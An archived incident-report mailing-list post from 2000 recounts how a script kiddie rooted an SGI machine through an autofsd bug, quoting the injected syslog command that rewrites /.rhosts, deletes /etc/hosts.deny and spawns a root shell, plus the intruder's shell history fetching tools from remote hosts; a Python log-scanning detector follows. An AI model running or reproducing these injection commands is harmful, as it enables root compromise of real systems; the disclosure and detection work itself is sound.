Security Incidents mailing list archives
Hacked by the script kiddie - an ordinary netadmin's day
From: urbanec () CIV ZCU CZ (Jakub Urbanec)
Date: Wed, 21 Jun 2000 10:40:32 +0200
Hi,

One of our machines was hacked on Jun 6 by (probably) the script kiddie from 216-119-26-75.o1.jps.net :-( Fortunately he/she left almost everything we needed for identifying the source of the attack - full syslog dump, history file, suid binaries, backdoor binaries. <attention>Full names/IPs included!</attention>

The method of the hack was a good old SGI autofsd bug - more in syslog:

autofsd[229]: mount of /hosts/;echo '+ +' > /.rhosts;rm -rf /etc/hosts.deny; \
echo "courier stream tcp nowait root /bin/sh sh -i" > /tmp/bob;inetd /tmp/bob

followed by:

login[85169]: root () 216-119-26-75 o1 jps net as root

After that he/she added a user 'adm' (thanks for the history file!) and installed binaries - the interesting one is the trinoo (DDoS) agent (as well as 'cocaine', 'gibd00r?', bind shell).

So, here's the history file of user 'adm':

# /bin/ls -C $*; }
# nslookup our.machine.here
# ft
# cd /dev/chr
# ftp charlie.cns.iit.edu
# chmod +sx *
# ./eggdrop doomed.tcl
# exit
# /bin/ls -C $*; }
# ./c
# /bin/ls -C $*; }
# cd /tmp
# ls
# rcp enter@208.243.33.204:/usr/people/enter/irix/c c; chmod 755 c;
# ./c 212.179.33.90 23
# ./c 63.236.135.128 23
# /bin/ls -C $*; }
# ls
# ./c 216.98.156.92 23
#

where ./c is probably 'cocaine' (courtesy of 'strings' - I'm damn sure I have seen this application before, but I couldn't find any info about it - does anybody have a clue?).

I have binaries and logs, I can put them on the web if anybody needs them.

Sorry about the lengthy email, but I think you may be interested in how the script kiddies work and how a DDoS tool gets installed.

P.S. I. The hacked machine was taken down and installed from scratch.

P.S. II. The IPs/hosts mentioned above were already notified about this incident.

P.S. III. Never plug a default-installed SGI box into the public net: "...vanilla SGI boxes screaming "hack me pleeeease, my vendor did such a great job of making it eeeeeeasy" all over the place..." ("Playing redir games with ARP and ICMP" by Yuri Volobuev)

Jakub CUBA++ Urbanec

--
.................................................................
Jakub Cuba++ Urbanec      Univerzitni 20         tel.: +420-19-7491538
LPS-CIV-ZCU               306 14, Plzen          http://home.zcu.cz/~urbanec
                          Czech Republic
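The two syslog entries quoted in the post are a compact detection signature for this class of intrusion: autofsd logs the requested mount path verbatim, so an injected command line appears inside the "mount of ..." message, and the rewritten /.rhosts shows up moments later as a root login from an unfamiliar host. The following Python script is an added example (not part of the original post and not an SGI tool) that scans a syslog excerpt for both signs. The sample lines are constructed for this example: the autofsd and login entries reproduce the ones in the post (the login entry as the archive renders it, with the remote address mangled into "216-119-26-75 o1 jps net"), while the timestamps, the hostname "sgi" and the two benign entries are made up.

```python
import re

# Constructed sample syslog excerpt for this example. The autofsd and login
# entries reproduce the two lines quoted in the post (the login entry as the
# archive renders it); the timestamps, the hostname "sgi" and the two benign
# entries are made up.
SAMPLE_SYSLOG = """\
Jun  6 03:12:44 sgi autofsd[229]: mount of /hosts/;echo '+ +' > /.rhosts;rm -rf /etc/hosts.deny; echo "courier stream tcp nowait root /bin/sh sh -i" > /tmp/bob;inetd /tmp/bob
Jun  6 03:12:51 sgi login[85169]: root () 216-119-26-75 o1 jps net as root
Jun  6 03:15:02 sgi autofsd[229]: mount of /hosts/fileserver.example.org
Jun  6 03:16:10 sgi login[85170]: alice () workstation example org as alice
"""

# autofsd logs the requested mount path verbatim, so an injected command
# line shows up inside the "mount of ..." message.
AUTOFSD_RE = re.compile(r"autofsd\[\d+\]: mount of (?P<path>.*)$")
# Accepts both the real "user@host" form and the archive's "user () host" form.
LOGIN_RE = re.compile(
    r"login\[\d+\]: (?P<user>[^\s@]+)(?: \(\) |@)(?P<host>.+?) as (?P<as>\S+)$"
)

# Characters that have no business in a hostname or path but drive a shell.
SHELL_META = ";|&`$<>"
# Files and programs whose appearance in a mount request signal tampering with
# trust (rhosts), access control (hosts.deny/allow) or service startup (inetd).
SENSITIVE_TOKENS = (".rhosts", "hosts.equiv", "hosts.deny", "hosts.allow", "inetd")


def classify_mount_path(path):
    """Return the reasons a logged mount path looks like injected shell text."""
    reasons = []
    meta = [c for c in SHELL_META if c in path]
    if meta:
        reasons.append("shell metacharacters " + "".join(meta))
    for token in SENSITIVE_TOKENS:
        if token in path:
            reasons.append("references " + token)
    if any(ch.isspace() for ch in path.strip()):
        reasons.append("whitespace inside mount path")
    return reasons


def scan_syslog(text):
    """Scan syslog text and return the findings worth an analyst's attention."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = AUTOFSD_RE.search(line)
        if m:
            reasons = classify_mount_path(m.group("path"))
            if reasons:
                findings.append({"line": lineno, "kind": "autofsd-injection",
                                 "reasons": reasons})
            continue
        m = LOGIN_RE.search(line)
        if m and m.group("as") == "root":
            # A root login right after a tampered mount request is the pattern
            # from the post: .rhosts was rewritten, then the host was trusted.
            findings.append({"line": lineno, "kind": "root-login",
                             "user": m.group("user"), "host": m.group("host")})
    return findings


if __name__ == "__main__":
    for finding in scan_syslog(SAMPLE_SYSLOG):
        print(finding)
```

Run against a real syslog dump, the script flags every autofsd mount request carrying shell metacharacters or references to trust files, and every root login regardless of host, so the analyst can correlate the two by timestamp as the post did. The metacharacter and token lists are deliberately short and are assumptions of this example; extend them to match what your own automounter logs.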